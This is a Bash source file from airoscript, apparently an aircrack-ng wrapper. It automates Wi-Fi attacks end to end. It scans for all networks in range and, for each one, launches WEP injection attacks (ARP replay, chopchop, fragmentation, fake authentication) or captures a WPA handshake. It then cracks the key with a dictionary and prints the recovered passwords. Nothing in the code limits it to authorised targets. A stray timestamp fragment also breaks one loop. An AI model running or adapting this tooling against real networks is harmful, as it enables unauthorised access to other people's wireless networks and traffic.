# Autocrack functions file for airoscript. # Copyright (C) 2011 David Francos Cuartero # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # FUCKING UNPOLISHED, but... it seems to work. source $path/attacks/others source $path/attacks/injection source $path/attacks/wpa source $path/attacks/auth source $path/attacks/wep source $path/crack/main autopwn(){ func=$1; shift; autopwn_$func $@; } autopwn_setvars(){ attack_functions_wep=(fakeauto fakeinteractive chopchop caffelate hirte arpreplay_auto arpreplay_interactive fragmentation chopchopclient pskarp) attack_functions_wpa=(handshake) F=0; export AUTO=$1; export QUIET=1; export INTERACTIVE=0; next=0; count=0; export writekey="-l $DUMP_PATH/$Host_MAC.key" [[ $1 == 1 ]] && export ENCRYPT=""; } autopwn_scan(){ launch_counter $time_to_scan & choosescan # Choose scan in auto auto auto mode. sleep $time_to_scan && killall -2 "airodump-ng"; reload_config while read line; do ⮂ 17:43:43 ⮂ 2013-08-10 [[ $line =~ ^Station\ MAC,(.*) ]] && next=0; [[ $next == 1 ]] && echo $line; [[ $line =~ ^BSSID,(.*) ]] && next=1; done < ${DUMP_PATH}/dump-01.csv | tac > ${DUMP_PATH}/dump-02.csv filter_ssid } autopwn_selectap(){ export AUTO=2; selectAp; sleep 1 } autopwn_crack(){ check_function Crack_with_dictionary_generator && { export wait_for_execute=1; AUTO=1; Crack_with_dictionary_generator autocrack } || { export wait_for_execute=1; AUTO=1; selectcracking 1; AUTO=0; export wait_for_execute=0; } } count_aps(){ a=($(wc -l $DUMP_PATH/dump-02.csv)); echo ${a[0]}; } # benchmarks shows this is a little more efficent than using cut. autopwn_runner(){ autopwn setvars 1 autopwn scan && MAX_TARGETS=$(count_aps); echo; tag; warn "${mark}Networks detected $MAX_TARGETS"; sleep 1 for i in `seq 1 $MAX_TARGETS`; do echo autopwn selectap if [ "$Host_SSID" != "" ]; then autopwn network; else tag; warn "${mark}Couldn't find essid, trying with next network."; fi done autopwn print_cracked_networks } autopwn_print_cracked_networks(){ [[ $DUMP_PATH/*.key ]] && { tag; warn ${mark}"Cracked networks:" for file in $DUMP_PATH/*.key; do echo "\t${mark}$file : `cat $file`" done } } autopwn_finish(){ check_function doexit || source $path/internal/exit; [[ $options_autoconfigure ]] && { configure; doexit killme; } || { read -p "Press c to configure, q to quit, n to next network and any key to get back to main menu" -s -n1 ans [[ "$ans" == "c" ]] && { configure; return 1; } [[ $ans == "n" ]] && return 0 [[ $ans == "q" ]] && { warn "${mark}Exiting..." doexit killme ; exit; pkill -9 airoscript-ng; killall -9 airoscript-ng } return 1 } } autopwn_failed_cracking(){ warn "${mark}Network NOT cracked. Something failed." [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && warn "${mark}Most probable cause is that network's key is not in the dictionary" } autopwn_network(){ autopwn setvars 2 [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { enc=wpa; attack_functions=${attack_functions_wpa[@]}; min_ivs=10; } || { enc=wep; attack_functions=${attack_functions_wep} } for i in ${attack_functions[@]}; do tag; echo "${mark}Attack $count. Using $i in $Host_MAC" { ${enc}_attacks $i & cleanp & get_min_ivs; } &> /dev/null [[ $enc == wpa ]] || { tag; warn "${mark}Needed ivs: $min_ivs" } while [ "1" ]; do sleep 5 autopwn finished && { # We have enough ivs echo; tag; warn "${mark}Trying to crack network, we have enough ivs or handshakes."; autopwn crack && autopwn_print_crack_status autopwn finish && break || { break; mainmenu; } } || { # We don't have enough ivs autopwn print_capture_status && { echo; break; } || status=$? } [[ $status == 20 ]] && break done [[ $status == 20 ]] && { status=0; break; } count=$(( $count + 1 )) done cleanautovars clear=$oldclear; } autopwn_print_crack_status(){ [[ -e $DUMP_PATH/$Host_MAC.key ]] && \ warn "${mark}Network cracked, password is `cat $DUMP_PATH/$Host_MAC.key`" || \ autopwn failed_cracking } autopwn_print_capture_status(){ [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { specialwarn "\r\t${mark}Current Handshakes: $handshakes. Press a to go to next attack, m for menu, for next network" ; } || { specialwarn "\r\t${mark}Current IVS: `check_all_ivs`. Press a to go to next attack, m for menu, n for next network" ; } read -t1 -n1 -p" " ans [[ $ans == "m" ]] && { cleanautovars; $clear; mainmenu; ans="a"; } [[ $ans == "k" ]] && return 20 [[ $ans == "a" ]] } check_all_ivs(){ while IFS=, read -a line; do [[ ${line[0]} == "${Host_MAC}" ]] && echo ${line[10]} ; done < ${DUMP_PATH}/${Host_MAC}-01.csv; } get_min_ivs(){ [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { min_ivs=10; return; } check_function Crack_with_dictionary_generator && { Crack_with_dictionary_generator return_ivs; a=$? } || { a=255 } [[ "$a" == 255 ]] && min_ivs=$autopwn_min_ivs || min_ivs=$a } get_handshake_number(){ while read -a line; do [[ ${line[@]} =~ (.*)handshake(.*) ]] && echo ${line[-2]/(/}; done < <( aircrack-ng ${DUMP_PATH}/${Host_MAC}-01.cap & sleep 0.5 && kill $! ) } check_if_handshake(){ export handshakes=$(get_handshake_number); [[ $handshakes == "" ]] && handshakes=0 (( $handshakes > 0 )) && return 0 || return 1 } autopwn_finished(){ [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { check_if_handshake && { tag; warn "${mark}Got WPA handshake ($handshakes eapol packets)" return 0 } || { return 1; } } || { get_min_ivs; ivs=`check_all_ivs`; [[ $ivs == "" ]] && ivs=0; (( $ivs > $min_ivs )) && return 0 || return 1 } }